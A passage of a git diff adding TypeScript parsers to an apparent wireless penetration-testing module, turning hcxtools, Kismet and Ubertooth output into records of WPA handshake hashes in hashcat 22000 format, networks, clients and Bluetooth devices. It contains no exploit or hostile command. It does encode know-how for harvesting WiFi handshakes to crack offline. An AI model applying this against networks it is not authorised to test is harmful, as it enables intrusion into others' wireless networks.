+    if (channel >= 36 && channel <= 177) return 5000 + channel * 5
+    return 0
+  }
+}
diff --git a/packages/opencode/src/pentest/wirelessscan/parsers/hcxtools.ts b/packages/opencode/src/pentest/wirelessscan/parsers/hcxtools.ts
new file mode 100644
index 00000000000..eb82d156d7c
--- /dev/null
+++ b/packages/opencode/src/pentest/wirelessscan/parsers/hcxtools.ts
@@ -0,0 +1,462 @@
+/**
+ * @fileoverview HCX Tools Output Parser
+ *
+ * Parses output from hcxdumptool and hcxpcapngtool:
+ * - PCAPNG capture info
+ * - Hash file output (22000 format)
+ * - PMKID and EAPOL data
+ *
+ * @module pentest/wirelessscan/parsers/hcxtools
+ */
+
+import { WirelessScanTypes } from "../types"
+import { WirelessScanStorage } from "../storage"
+
+/**
+ * HCX tools parser namespace.
+ */
+export namespace HcxToolsParser {
+  // ========== Hash Types ==========
+
+  /**
+   * Hashcat 22000 hash entry.
+   */
+  export interface Hash22000 {
+    type: "PMKID" | "EAPOL"
+    protocol: "WPA" | "WPA2" | "WPA2*" | "WPA*"
+    pmkid?: string
+    mic?: string
+    macAP: string
+    macClient: string
+    essid: string
+    essidHex: string
+    anonce?: string
+    eapol?: string
+    messagePair?: number
+  }
+
+  /**
+   * PMKID entry from capture.
+   */
+  export interface PMKIDEntry {
+    pmkid: string
+    macAP: string
+    macClient: string
+    essid: string
+    timestamp?: number
+  }
+
+  /**
+   * EAPOL handshake from capture.
+   */
+  export interface EAPOLHandshake {
+    macAP: string
+    macClient: string
+    essid: string
+    anonce: string
+    snonce: string
+    mic: string
+    keyVersion: number
+    messagePair: number
+    timestamp?: number
+  }
+
+  // ========== hcxdumptool Info Types ==========
+
+  /**
+   * hcxdumptool status info.
+   */
+  export interface DumptoolStatus {
+    interface: string
+    channel: number
+    beacons: number
+    probes: number
+    associations: number
+    reassociations: number
+    authentications: number
+    deauthentications: number
+    pmkids: number
+    eapols: number
+    handshakes: number
+  }
+
+  // ========== Hash File Parsing ==========
+
+  /**
+   * Parse hashcat 22000 format hash file.
+   *
+   * Format:
+   * WPA*02*MIC*MACAP*MACCLIENT*ESSID*ANONCE*EAPOL*MESSAGEPAIR
+   * WPA*01*PMKID*MACAP*MACCLIENT*ESSID***
+   */
+  export function parseHash22000(content: string): Hash22000[] {
+    const hashes: Hash22000[] = []
+    const lines = content.split("\n")
+
+    for (const line of lines) {
+      const trimmed = line.trim()
+      if (!trimmed || !trimmed.startsWith("WPA")) continue
+
+      const hash = parseHashLine(trimmed)
+      if (hash) {
+        hashes.push(hash)
+      }
+    }
+
+    return hashes
+  }
+
+  /**
+   * Convert 22000 hashes to handshake captures.
+   */
+  export function hashesToHandshakes(hashes: Hash22000[]): WirelessScanTypes.HandshakeCapture[] {
+    return hashes.map((hash) => ({
+      id: WirelessScanStorage.createNetworkId(),
+      bssid: formatMac(hash.macAP),
+      essid: hash.essid,
+      clientMac: formatMac(hash.macClient),
+      type: hash.type === "PMKID" ? "pmkid" : "4-way",
+      complete: hash.type === "EAPOL",
+      capturedAt: Date.now(),
+    }))
+  }
+
+  /**
+   * Extract networks from hashes.
+   */
+  export function hashesToNetworks(hashes: Hash22000[]): WirelessScanTypes.WiFiNetwork[] {
+    const networks = new Map<string, WirelessScanTypes.WiFiNetwork>()
+
+    for (const hash of hashes) {
+      const bssid = formatMac(hash.macAP)
+      if (!networks.has(bssid)) {
+        networks.set(bssid, {
+          id: WirelessScanStorage.createNetworkId(),
+          bssid,
+          essid: hash.essid,
+          channel: 0,
+          frequency: 0,
+          band: "unknown",
+          signal: -100,
+          encryption: hash.protocol.includes("2") ? "wpa2" : "wpa",
+          cipher: "ccmp",
+          authentication: "psk",
+          wps: false,
+          wpsLocked: false,
+          hidden: false,
+          beacons: 0,
+          dataPackets: 0,
+          clients: [formatMac(hash.macClient)],
+          pmkidVulnerable: hash.type === "PMKID",
+          firstSeen: Date.now(),
+          lastSeen: Date.now(),
+        })
+      } else {
+        const network = networks.get(bssid)!
+        const clientMac = formatMac(hash.macClient)
+        if (!network.clients.includes(clientMac)) {
+          network.clients.push(clientMac)
+        }
+        if (hash.type === "PMKID") {
+          network.pmkidVulnerable = true
+        }
+      }
+    }
+
+    return Array.from(networks.values())
+  }
+
+  // ========== hcxpcapngtool Output Parsing ==========
+
+  /**
+   * Parse hcxpcapngtool statistics output.
+   *
+   * Sample output:
+   * reading from capture.pcapng...
+   * summary capture file
+   * ---------------------
+   * file name................................: capture.pcapng
+   * networks detected........................: 15
+   * PMKID (total)............................: 3
+   * EAPOL pairs (total)......................: 5
+   */
+  export function parseHcxpcapngtoolOutput(output: string): {
+    stats: Record<string, number>
+    networks: string[]
+    pmkids: PMKIDEntry[]
+    handshakes: EAPOLHandshake[]
+  } {
+    const stats: Record<string, number> = {}
+    const networks: string[] = []
+    const pmkids: PMKIDEntry[] = []
+    const handshakes: EAPOLHandshake[] = []
+
+    const lines = output.split("\n")
+
+    for (const line of lines) {
+      const trimmed = line.trim()
+
+      // Parse statistics lines
+      const statMatch = trimmed.match(/^([^.]+)\.+:\s*(\d+)$/)
+      if (statMatch) {
+        const key = statMatch[1].trim().toLowerCase().replace(/\s+/g, "_")
+        stats[key] = parseInt(statMatch[2], 10)
+        continue
+      }
+
+      // Parse network lines (BSSID: MAC ESSID: name)
+      const networkMatch = trimmed.match(/BSSID[:\s]+([0-9a-f:]{17}).*?ESSID[:\s]+(.+)/i)
+      if (networkMatch) {
+        networks.push(`${networkMatch[1].toUpperCase()}:${networkMatch[2].trim()}`)
+        continue
+      }
+
+      // Parse PMKID lines
+      const pmkidMatch = trimmed.match(
+        /PMKID[:\s]+([0-9a-f]{32}).*?AP[:\s]+([0-9a-f:]{17}).*?STA[:\s]+([0-9a-f:]{17})/i
+      )
+      if (pmkidMatch) {
+        pmkids.push({
+          pmkid: pmkidMatch[1].toUpperCase(),
+          macAP: pmkidMatch[2].toUpperCase(),
+          macClient: pmkidMatch[3].toUpperCase(),
+          essid: "",
+        })
+      }
+    }
+
+    return { stats, networks, pmkids, handshakes }
+  }
+
+  // ========== hcxdumptool Status Parsing ==========
+
+  /**
+   * Parse hcxdumptool status output.
+   *
+   * Sample:
+   * INFO: cha=6, rx=1234, tx=567, err=0
+   * INFO: BEACON=500, PROBEREQUEST=100, PROBERESPONSE=50
+   * INFO: AUTHENTICATION=20, ASSOCIATION=15, REASSOCIATION=5
+   * INFO: PMKID=3, EAPOL=7
+   */
+  export function parseHcxdumptoolStatus(output: string): DumptoolStatus {
+    const status: DumptoolStatus = {
+      interface: "",
+      channel: 0,
+      beacons: 0,
+      probes: 0,
+      associations: 0,
+      reassociations: 0,
+      authentications: 0,
+      deauthentications: 0,
+      pmkids: 0,
+      eapols: 0,
+      handshakes: 0,
+    }
+
+    const lines = output.split("\n")
+
+    for (const line of lines) {
+      const trimmed = line.trim()
+
+      // Parse channel
+      const chaMatch = trimmed.match(/cha(?:nnel)?[=:\s]+(\d+)/i)
+      if (chaMatch) {
+        status.channel = parseInt(chaMatch[1], 10)
+      }
+
+      // Parse interface
+      const ifMatch = trimmed.match(/(?:interface|iface)[=:\s]+(\w+)/i)
+      if (ifMatch) {
+        status.interface = ifMatch[1]
+      }
+
+      // Parse counters
+      const patterns: [string, keyof DumptoolStatus][] = [
+        ["BEACON", "beacons"],
+        ["PROBERE(?:QUEST|SPONSE)", "probes"],
+        ["ASSOCIATION", "associations"],
+        ["REASSOCIATION", "reassociations"],
+        ["AUTHENTICATION", "authentications"],
+        ["DEAUTH(?:ENTICATION)?", "deauthentications"],
+        ["PMKID", "pmkids"],
+        ["EAPOL", "eapols"],
+        ["HANDSHAKE", "handshakes"],
+      ]
+
+      for (const [pattern, key] of patterns) {
+        const regex = new RegExp(`${pattern}[=:\\s]+(\\d+)`, "i")
+        const match = trimmed.match(regex)
+        if (match) {
+          ;(status[key] as number) = parseInt(match[1], 10)
+        }
+      }
+    }
+
+    return status
+  }
+
+  /**
+   * Parse hcxdumptool real-time output for events.
+   */
+  export interface HcxEvent {
+    type: "pmkid" | "eapol" | "deauth" | "beacon" | "probe"
+    timestamp: number
+    macAP?: string
+    macClient?: string
+    essid?: string
+    channel?: number
+  }
+
+  /**
+   * Parse hcxdumptool real-time event output.
+   */
+  export function parseHcxdumptoolEvents(output: string): HcxEvent[] {
+    const events: HcxEvent[] = []
+    const lines = output.split("\n")
+
+    for (const line of lines) {
+      const trimmed = line.trim()
+      if (!trimmed) continue
+
+      // PMKID captured
+      if (trimmed.includes("PMKID") || trimmed.includes("pmkid")) {
+        const macAPMatch = trimmed.match(/(?:AP|BSSID)[:\s]+([0-9a-f:]{17})/i)
+        const macClientMatch = trimmed.match(/(?:STA|CLIENT)[:\s]+([0-9a-f:]{17})/i)
+        const essidMatch = trimmed.match(/ESSID[:\s]+([^\s]+)/i)
+
+        events.push({
+          type: "pmkid",
+          timestamp: Date.now(),
+          macAP: macAPMatch?.[1].toUpperCase(),
+          macClient: macClientMatch?.[1].toUpperCase(),
+          essid: essidMatch?.[1],
+        })
+        continue
+      }
+
+      // EAPOL captured
+      if (trimmed.includes("EAPOL") || trimmed.includes("M1") || trimmed.includes("M2")) {
+        const macAPMatch = trimmed.match(/(?:AP|BSSID)[:\s]+([0-9a-f:]{17})/i)
+        const macClientMatch = trimmed.match(/(?:STA|CLIENT)[:\s]+([0-9a-f:]{17})/i)
+        const essidMatch = trimmed.match(/ESSID[:\s]+([^\s]+)/i)
+
+        events.push({
+          type: "eapol",
+          timestamp: Date.now(),
+          macAP: macAPMatch?.[1].toUpperCase(),
+          macClient: macClientMatch?.[1].toUpperCase(),
+          essid: essidMatch?.[1],
+        })
+        continue
+      }
+    }
+
+    return events
+  }
+
+  // ========== Helper Functions ==========
+
+  function parseHashLine(line: string): Hash22000 | null {
+    const parts = line.split("*")
+    if (parts.length < 6) return null
+
+    const [protocol, typeNum, data1, macAP, macClient, essidHex, ...rest] = parts
+
+    const type = typeNum === "01" ? "PMKID" : "EAPOL"
+
+    // Decode ESSID from hex
+    let essid = ""
+    try {
+      essid = hexToString(essidHex)
+    } catch {
+      essid = essidHex
+    }
+
+    if (type === "PMKID") {
+      return {
+        type,
+        protocol: protocol as Hash22000["protocol"],
+        pmkid: data1,
+        macAP,
+        macClient,
+        essid,
+        essidHex,
+      }
+    } else {
+      // EAPOL format: WPA*02*MIC*MACAP*MACCLIENT*ESSID*ANONCE*EAPOL*MESSAGEPAIR
+      const [anonce, eapol, messagePair] = rest
+      return {
+        type,
+        protocol: protocol as Hash22000["protocol"],
+        mic: data1,
+        macAP,
+        macClient,
+        essid,
+        essidHex,
+        anonce,
+        eapol,
+        messagePair: messagePair ? parseInt(messagePair, 10) : undefined,
+      }
+    }
+  }
+
+  function formatMac(hex: string): string {
+    // Convert hex MAC to colon-separated format
+    if (hex.includes(":")) return hex.toUpperCase()
+    if (hex.length !== 12) return hex.toUpperCase()
+
+    return `${hex.slice(0, 2)}:${hex.slice(2, 4)}:${hex.slice(4, 6)}:${hex.slice(6, 8)}:${hex.slice(8, 10)}:${hex.slice(10, 12)}`.toUpperCase()
+  }
+
+  function hexToString(hex: string): string {
+    let str = ""
+    for (let i = 0; i < hex.length; i += 2) {
+      const charCode = parseInt(hex.slice(i, i + 2), 16)
+      if (charCode > 0) {
+        str += String.fromCharCode(charCode)
+      }
+    }
+    return str
+  }
+
+  // ========== Utility Functions ==========
+
+  /**
+   * Check if a hash file contains valid 22000 format hashes.
+   */
+  export function isValid22000Format(content: string): boolean {
+    const lines = content.split("\n")
+    return lines.some((line) => {
+      const trimmed = line.trim()
+      return (
+        trimmed.startsWith("WPA*01*") ||
+        trimmed.startsWith("WPA*02*") ||
+        trimmed.startsWith("WPA2*01*") ||
+        trimmed.startsWith("WPA2*02*")
+      )
+    })
+  }
+
+  /**
+   * Get summary statistics from hashes.
+   */
+  export function getHashStats(hashes: Hash22000[]): {
+    totalHashes: number
+    pmkidCount: number
+    eapolCount: number
+    uniqueNetworks: number
+    uniqueClients: number
+  } {
+    const networks = new Set(hashes.map((h) => h.macAP))
+    const clients = new Set(hashes.map((h) => h.macClient))
+
+    return {
+      totalHashes: hashes.length,
+      pmkidCount: hashes.filter((h) => h.type === "PMKID").length,
+      eapolCount: hashes.filter((h) => h.type === "EAPOL").length,
+      uniqueNetworks: networks.size,
+      uniqueClients: clients.size,
+    }
+  }
+}
diff --git a/packages/opencode/src/pentest/wirelessscan/parsers/index.ts b/packages/opencode/src/pentest/wirelessscan/parsers/index.ts
new file mode 100644
index 00000000000..158762303d2
--- /dev/null
+++ b/packages/opencode/src/pentest/wirelessscan/parsers/index.ts
@@ -0,0 +1,13 @@
+/**
+ * @fileoverview Wireless Scanner Parsers
+ *
+ * Exports parsers for external wireless security tools.
+ *
+ * @module pentest/wirelessscan/parsers
+ */
+
+export { AircrackParser } from "./aircrack"
+export { KismetParser } from "./kismet"
+export { BettercapParser } from "./bettercap"
+export { UbertoothParser } from "./ubertooth"
+export { HcxToolsParser } from "./hcxtools"
diff --git a/packages/opencode/src/pentest/wirelessscan/parsers/kismet.ts b/packages/opencode/src/pentest/wirelessscan/parsers/kismet.ts
new file mode 100644
index 00000000000..fa7c4985a4d
--- /dev/null
+++ b/packages/opencode/src/pentest/wirelessscan/parsers/kismet.ts
@@ -0,0 +1,434 @@
+/**
+ * @fileoverview Kismet Output Parser
+ *
+ * Parses output from Kismet wireless network detector:
+ * - Kismet JSON export
+ * - Kismet XML export
+ * - Kismet netxml format
+ *
+ * @module pentest/wirelessscan/parsers/kismet
+ */
+
+import { WirelessScanTypes } from "../types"
+import { WirelessScanStorage } from "../storage"
+
+/**
+ * Kismet parser namespace.
+ */
+export namespace KismetParser {
+  // ========== Kismet JSON Types ==========
+
+  /**
+   * Kismet device JSON structure.
+   */
+  export interface KismetDevice {
+    "kismet.device.base.macaddr"?: string
+    "kismet.device.base.name"?: string
+    "kismet.device.base.type"?: string
+    "kismet.device.base.manuf"?: string
+    "kismet.device.base.channel"?: string
+    "kismet.device.base.frequency"?: number
+    "kismet.device.base.signal"?: {
+      "kismet.common.signal.last_signal"?: number
+      "kismet.common.signal.last_noise"?: number
+      "kismet.common.signal.max_signal"?: number
+    }
+    "kismet.device.base.first_time"?: number
+    "kismet.device.base.last_time"?: number
+    "kismet.device.base.packets.total"?: number
+    "dot11.device"?: KismetDot11Device
+  }
+
+  /**
+   * Kismet 802.11 device info.
+   */
+  export interface KismetDot11Device {
+    "dot11.device.typeset"?: number
+    "dot11.device.client_map"?: Record<string, KismetClient>
+    "dot11.device.advertised_ssid_map"?: Record<string, KismetSSID>
+    "dot11.device.last_bssid"?: string
+    "dot11.device.bss_timestamp"?: number
+    "dot11.device.wps_m3_count"?: number
+    "dot11.device.wpa_handshake_list"?: unknown[]
+    "dot11.device.pmkid_packet"?: unknown
+  }
+
+  /**
+   * Kismet SSID info.
+   */
+  export interface KismetSSID {
+    "dot11.advertisedssid.ssid"?: string
+    "dot11.advertisedssid.ssidlen"?: number
+    "dot11.advertisedssid.beacon"?: boolean
+    "dot11.advertisedssid.crypt_set"?: number
+    "dot11.advertisedssid.wps_state"?: number
+    "dot11.advertisedssid.wps_manuf"?: string
+    "dot11.advertisedssid.wps_model_name"?: string
+    "dot11.advertisedssid.wps_model_number"?: string
+    "dot11.advertisedssid.first_time"?: number
+    "dot11.advertisedssid.last_time"?: number
+    "dot11.advertisedssid.channel"?: string
+  }
+
+  /**
+   * Kismet client info.
+   */
+  export interface KismetClient {
+    "dot11.client.bssid"?: string
+    "dot11.client.first_time"?: number
+    "dot11.client.last_time"?: number
+    "dot11.client.datasize"?: number
+    "dot11.client.type"?: number
+  }
+
+  // ========== JSON Parser ==========
+
+  /**
+   * Parse Kismet JSON export for WiFi networks.
+   */
+  export function parseKismetJson(json: string): {
+    networks: WirelessScanTypes.WiFiNetwork[]
+    clients: WirelessScanTypes.WiFiClient[]
+    devices: WirelessScanTypes.BluetoothDevice[]
+  } {
+    const networks: WirelessScanTypes.WiFiNetwork[] = []
+    const clients: WirelessScanTypes.WiFiClient[] = []
+    const devices: WirelessScanTypes.BluetoothDevice[] = []
+
+    let data: KismetDevice[]
+    try {
+      data = JSON.parse(json)
+      if (!Array.isArray(data)) {
+        data = [data]
+      }
+    } catch {
+      return { networks, clients, devices }
+    }
+
+    for (const device of data) {
+      const type = device["kismet.device.base.type"] || ""
+
+      if (type === "Wi-Fi AP" || type === "Wi-Fi Device") {
+        const network = parseWiFiDevice(device)
+        if (network) {
+          networks.push(network)
+        }
+
+        // Extract clients from the device
+        const clientMap = device["dot11.device"]?.["dot11.device.client_map"]
+        if (clientMap) {
+          for (const [mac, clientData] of Object.entries(clientMap)) {
+            const client = parseClient(mac, clientData, device)
+            if (client) {
+              clients.push(client)
+            }
+          }
+        }
+      } else if (type === "Wi-Fi Client") {
+        const client = parseClientDevice(device)
+        if (client) {
+          clients.push(client)
+        }
+      } else if (type === "BR/EDR" || type === "BTLE" || type === "Bluetooth") {
+        const btDevice = parseBluetoothDevice(device)
+        if (btDevice) {
+          devices.push(btDevice)
+        }
+      }
+    }
+
+    return { networks, clients, devices }
+  }
+
+  /**
+   * Parse Kismet alerts JSON.
+   */
+  export interface KismetAlert {
+    type: string
+    severity: WirelessScanTypes.Severity
+    message: string
+    source: string
+    dest?: string
+    timestamp: number
+  }
+
+  /**
+   * Parse Kismet alerts.
+   */
+  export function parseKismetAlerts(json: string): KismetAlert[] {
+    const alerts: KismetAlert[] = []
+
+    let data: unknown[]
+    try {
+      data = JSON.parse(json)
+      if (!Array.isArray(data)) {
+        return alerts
+      }
+    } catch {
+      return alerts
+    }
+
+    for (const item of data) {
+      const alert = item as Record<string, unknown>
+      const alertType = String(alert["kismet.alert.header"] || "unknown")
+      const text = String(alert["kismet.alert.text"] || "")
+      const source = String(alert["kismet.alert.source_mac"] || "")
+      const dest = alert["kismet.alert.dest_mac"] as string | undefined
+      const timestamp = Number(alert["kismet.alert.timestamp"]) || Date.now() / 1000
+
+      alerts.push({
+        type: alertType,
+        severity: mapAlertSeverity(alertType),
+        message: text,
+        source,
+        dest,
+        timestamp: timestamp * 1000,
+      })
+    }
+
+    return alerts
+  }
+
+  // ========== Kismet NetXML Parser ==========
+
+  /**
+   * Parse Kismet netxml format.
+   */
+  export function parseNetXml(xml: string): WirelessScanTypes.WiFiNetwork[] {
+    const networks: WirelessScanTypes.WiFiNetwork[] = []
+
+    // Simple regex-based parsing for netxml
+    const networkPattern =
+      /<wireless-network[^>]*type="([^"]*)"[^>]*>([\s\S]*?)<\/wireless-network>/g
+    let match: RegExpExecArray | null
+
+    while ((match = networkPattern.exec(xml)) !== null) {
+      const type = match[1]
+      const content = match[2]
+
+      // Only process infrastructure networks
+      if (type !== "infrastructure") continue
+
+      const network = parseNetXmlNetwork(content)
+      if (network) {
+        networks.push(network)
+      }
+    }
+
+    return networks
+  }
+
+  // ========== Helper Functions ==========
+
+  function parseWiFiDevice(device: KismetDevice): WirelessScanTypes.WiFiNetwork | null {
+    const mac = device["kismet.device.base.macaddr"]
+    if (!mac) return null
+
+    const dot11 = device["dot11.device"]
+    const ssidMap = dot11?.["dot11.device.advertised_ssid_map"] || {}
+    const firstSsid = Object.values(ssidMap)[0]
+
+    const essid = firstSsid?.["dot11.advertisedssid.ssid"] || ""
+    const channel = parseInt(
+      firstSsid?.["dot11.advertisedssid.channel"] || device["kismet.device.base.channel"] || "0",
+      10
+    )
+    const frequency = device["kismet.device.base.frequency"] || channelToFrequency(channel)
+    const signal = device["kismet.device.base.signal"]
+    const cryptSet = firstSsid?.["dot11.advertisedssid.crypt_set"] || 0
+
+    const wpsState = firstSsid?.["dot11.advertisedssid.wps_state"] || 0
+    const hasHandshake = (dot11?.["dot11.device.wpa_handshake_list"]?.length || 0) > 0
+    const hasPmkid = !!dot11?.["dot11.device.pmkid_packet"]
+
+    return {
+      id: WirelessScanStorage.createNetworkId(),
+      bssid: mac.toUpperCase(),
+      essid: essid || "<hidden>",
+      channel,
+      frequency,
+      band: channel <= 14 ? "2.4ghz" : channel <= 177 ? "5ghz" : "6ghz",
+      signal: signal?.["kismet.common.signal.last_signal"] || -100,
+      noise: signal?.["kismet.common.signal.last_noise"],
+      quality: signalToQuality(signal?.["kismet.common.signal.last_signal"] || -100),
+      encryption: cryptSetToEncryption(cryptSet),
+      cipher: cryptSetToCipher(cryptSet),
+      authentication: cryptSetToAuth(cryptSet),
+      wps: wpsState > 0,
+      wpsLocked: wpsState === 2,
+      hidden: !essid || essid.length === 0,
+      vendor: device["kismet.device.base.manuf"],
+      beacons: 0,
+      dataPackets: device["kismet.device.base.packets.total"] || 0,
+      clients: [],
+      pmkidVulnerable: hasPmkid || hasHandshake,
+      firstSeen: (device["kismet.device.base.first_time"] || Date.now() / 1000) * 1000,
+      lastSeen: (device["kismet.device.base.last_time"] || Date.now() / 1000) * 1000,
+    }
+  }
+
+  function parseClient(
+    mac: string,
+    client: KismetClient,
+    _parentDevice: KismetDevice
+  ): WirelessScanTypes.WiFiClient | null {
+    return {
+      id: WirelessScanStorage.createDeviceId(),
+      mac: mac.toUpperCase(),
+      bssid: client["dot11.client.bssid"]?.toUpperCase(),
+      associated: !!client["dot11.client.bssid"],
+      packets: client["dot11.client.datasize"] || 0,
+      probes: [],
+      firstSeen: (client["dot11.client.first_time"] || Date.now() / 1000) * 1000,
+      lastSeen: (client["dot11.client.last_time"] || Date.now() / 1000) * 1000,
+    }
+  }
+
+  function parseClientDevice(device: KismetDevice): WirelessScanTypes.WiFiClient | null {
+    const mac = device["kismet.device.base.macaddr"]
+    if (!mac) return null
+
+    const dot11 = device["dot11.device"]
+    const signal = device["kismet.device.base.signal"]
+
+    return {
+      id: WirelessScanStorage.createDeviceId(),
+      mac: mac.toUpperCase(),
+      bssid: dot11?.["dot11.device.last_bssid"]?.toUpperCase(),
+      signal: signal?.["kismet.common.signal.last_signal"],
+      vendor: device["kismet.device.base.manuf"],
+      associated: !!dot11?.["dot11.device.last_bssid"],
+      packets: device["kismet.device.base.packets.total"] || 0,
+      probes: [],
+      firstSeen: (device["kismet.device.base.first_time"] || Date.now() / 1000) * 1000,
+      lastSeen: (device["kismet.device.base.last_time"] || Date.now() / 1000) * 1000,
+    }
+  }
+
+  function parseBluetoothDevice(device: KismetDevice): WirelessScanTypes.BluetoothDevice | null {
+    const mac = device["kismet.device.base.macaddr"]
+    if (!mac) return null
+
+    const type = device["kismet.device.base.type"] || ""
+    const signal = device["kismet.device.base.signal"]
+
+    return {
+      id: WirelessScanStorage.createDeviceId(),
+      address: mac.toUpperCase(),
+      name: device["kismet.device.base.name"],
+      type: type === "BTLE" ? "ble" : type === "BR/EDR" ? "classic" : "unknown",
+      rssi: signal?.["kismet.common.signal.last_signal"],
+      manufacturer: device["kismet.device.base.manuf"],
+      services: [],
+      serviceUuids: [],
+      uuids: [],
+      paired: false,
+      connected: false,
+      trusted: false,
+      blocked: false,
+      firstSeen: (device["kismet.device.base.first_time"] || Date.now() / 1000) * 1000,
+      lastSeen: (device["kismet.device.base.last_time"] || Date.now() / 1000) * 1000,
+    }
+  }
+
+  function parseNetXmlNetwork(content: string): WirelessScanTypes.WiFiNetwork | null {
+    const getValue = (tag: string): string => {
+      const match = content.match(new RegExp(`<${tag}>([^<]*)</${tag}>`))
+      return match?.[1] || ""
+    }
+
+    const bssid = getValue("BSSID")
+    if (!bssid || bssid.length !== 17) return null
+
+    const essid = getValue("essid")
+    const channel = parseInt(getValue("channel"), 10) || 0
+    const maxSignal = parseInt(getValue("max_signal_dbm"), 10) || -100
+
+    const encryption = content.includes("<encryption>") ? "wpa2" : "open"
+    const wps = content.includes("<wps-state>")
+
+    return {
+      id: WirelessScanStorage.createNetworkId(),
+      bssid: bssid.toUpperCase(),
+      essid: essid || "<hidden>",
+      channel,
+      frequency: channelToFrequency(channel),
+      band: channel <= 14 ? "2.4ghz" : channel <= 177 ? "5ghz" : "6ghz",
+      signal: maxSignal,
+      encryption,
+      cipher: encryption === "wpa2" ? "ccmp" : "none",
+      authentication: encryption === "wpa2" ? "psk" : "open",
+      wps,
+      wpsLocked: false,
+      hidden: !essid,
+      beacons: 0,
+      dataPackets: 0,
+      clients: [],
+      firstSeen: Date.now(),
+      lastSeen: Date.now(),
+    }
+  }
+
+  function cryptSetToEncryption(cryptSet: number): WirelessScanTypes.WiFiEncryption {
+    // Kismet crypt_set bit flags
+    const CRYPT_WEP = 1 << 1
+    const CRYPT_WPA = 1 << 5
+    const CRYPT_WPA2 = 1 << 9
+    const CRYPT_WPA3 = 1 << 13
+
+    if (cryptSet & CRYPT_WPA3) return "wpa3"
+    if (cryptSet & CRYPT_WPA2) return "wpa2"
+    if (cryptSet & CRYPT_WPA) return "wpa"
+    if (cryptSet & CRYPT_WEP) return "wep"
+    return "open"
+  }
+
+  function cryptSetToCipher(cryptSet: number): WirelessScanTypes.WiFiCipher {
+    const CRYPT_TKIP = 1 << 7
+    const CRYPT_CCMP = 1 << 8
+
+    if (cryptSet & CRYPT_CCMP) return "ccmp"
+    if (cryptSet & CRYPT_TKIP) return "tkip"
+    return "none"
+  }
+
+  function cryptSetToAuth(cryptSet: number): WirelessScanTypes.WiFiAuth {
+    const CRYPT_PSK = 1 << 6
+    const CRYPT_EAP = 1 << 10
+
+    if (cryptSet & CRYPT_EAP) return "eap"
+    if (cryptSet & CRYPT_PSK) return "psk"
+    return "open"
+  }
+
+  function channelToFrequency(channel: number): number {
+    if (channel >= 1 && channel <= 13) return 2407 + channel * 5
+    if (channel === 14) return 2484
+    if (channel >= 36 && channel <= 177) return 5000 + channel * 5
+    return 0
+  }
+
+  function signalToQuality(signal: number): number {
+    // Convert dBm to percentage (approximate)
+    if (signal >= -50) return 100
+    if (signal <= -100) return 0
+    return Math.round((signal + 100) * 2)
+  }
+
+  function mapAlertSeverity(alertType: string): WirelessScanTypes.Severity {
+    const critical = [
+      "DEAUTHFLOOD",
+      "DISASSOCFLOOD",
+      "BSSTIMESTAMP",
+      "CRYPTCHANGE",
+      "WPSBRUTE",
+    ]
+    const high = ["APSPOOF", "CHANCHANGE", "BSSPROBE", "NETSTUMBLER"]
+    const medium = ["LUCENTTEST", "MSFBCOMSSID", "MSFDLINKRATE"]
+
+    if (critical.some((c) => alertType.includes(c))) return "critical"
+    if (high.some((h) => alertType.includes(h))) return "high"
+    if (medium.some((m) => alertType.includes(m))) return "medium"
+    return "low"
+  }
+}
diff --git a/packages/opencode/src/pentest/wirelessscan/parsers/ubertooth.ts b/packages/opencode/src/pentest/wirelessscan/parsers/ubertooth.ts
new file mode 100644
index 00000000000..20a8266191c
--- /dev/null
+++ b/packages/opencode/src/pentest/wirelessscan/parsers/ubertooth.ts
@@ -0,0 +1,503 @@
+/**
+ * @fileoverview Ubertooth Output Parser
+ *
+ * Parses output from Ubertooth Bluetooth analysis tools:
+ * - ubertooth-btle (BLE sniffer)
+ * - ubertooth-btbb (Classic Bluetooth)
+ * - ubertooth-scan
+ *
+ * @module pentest/wirelessscan/parsers/ubertooth
+ */
+
+import { WirelessScanTypes } from "../types"
+import { WirelessScanStorage } from "../storage"
+
+/**
+ * Ubertooth parser namespace.
+ */
+export namespace UbertoothParser {
+  // ========== BLE Packet Types ==========
+
+  /**
+   * BLE advertisement packet.
+   */
+  export interface BLEAdvertisement {
+    timestamp: number
+    channel: number
+    accessAddress: string
+    advertisingAddress: string
+    advertisingType: string
+    data: string
+    rssi?: number
+    pduType?: number
+  }
+
+  /**
+   * BLE connection packet.
+   */
+  export interface BLEConnection {
+    timestamp: number
+    initiatorAddress: string
+    advertiserAddress: string
+    accessAddress: string
+    hopInterval: number
+    hopIncrement: number
+    channelMap: string
+  }
+
+  // ========== Classic Bluetooth Types ==========
+
+  /**
+   * Classic Bluetooth Basic Rate packet info.
+   */
+  export interface BTBBPacket {
+    timestamp: number
+    lap: string
+    uap?: string
+    nap?: string
+    clock: number
+    channel: number
+    packetType: string
+    payload?: string
+  }
+
+  /**
+   * Discovered piconet.
+   */
+  export interface Piconet {
+    lap: string
+    uap?: string
+    nap?: string
+    bdaddr?: string
+    packets: number
+    firstSeen: number
+    lastSeen: number
+  }
+
+  // ========== BLE Parsing ==========
+
+  /**
+   * Parse ubertooth-btle output.
+   *
+   * Format varies, commonly:
+   * systime=1705766400 ch=37 aa=8e89bed6 addr=AA:BB:CC:DD:EE:FF ADV_IND
+   */
+  export function parseBtleOutput(output: string): {
+    devices: WirelessScanTypes.BluetoothDevice[]
+    advertisements: BLEAdvertisement[]
+    connections: BLEConnection[]
+  } {
+    const devices = new Map<string, WirelessScanTypes.BluetoothDevice>()
+    const advertisements: BLEAdvertisement[] = []
+    const connections: BLEConnection[] = []
+
+    const lines = output.split("\n")
+
+    for (const line of lines) {
+      const trimmed = line.trim()
+      if (!trimmed) continue
+
+      // Parse advertisement
+      const adv = parseAdvertisement(trimmed)
+      if (adv) {
+        advertisements.push(adv)
+
+        // Update or create device
+        const addr = adv.advertisingAddress.toUpperCase()
+        if (addr && addr.length === 17) {
+          const existing = devices.get(addr)
+          if (existing) {
+            existing.lastSeen = adv.timestamp
+            if (adv.rssi && (!existing.rssi || adv.rssi > existing.rssi)) {
+              existing.rssi = adv.rssi
+            }
+          } else {
+            devices.set(addr, {
+              id: WirelessScanStorage.createDeviceId(),
+              address: addr,
+              type: "ble",
+              rssi: adv.rssi,
+              services: [],
+              serviceUuids: [],
+              uuids: [],
+              paired: false,
+              connected: false,
+              trusted: false,
+              blocked: false,
+              firstSeen: adv.timestamp,
+              lastSeen: adv.timestamp,
+            })
+          }
+        }
+        continue
+      }
+
+      // Parse connection
+      const conn = parseConnection(trimmed)
+      if (conn) {
+        connections.push(conn)
+        continue
+      }
+    }
+
+    return {
+      devices: Array.from(devices.values()),
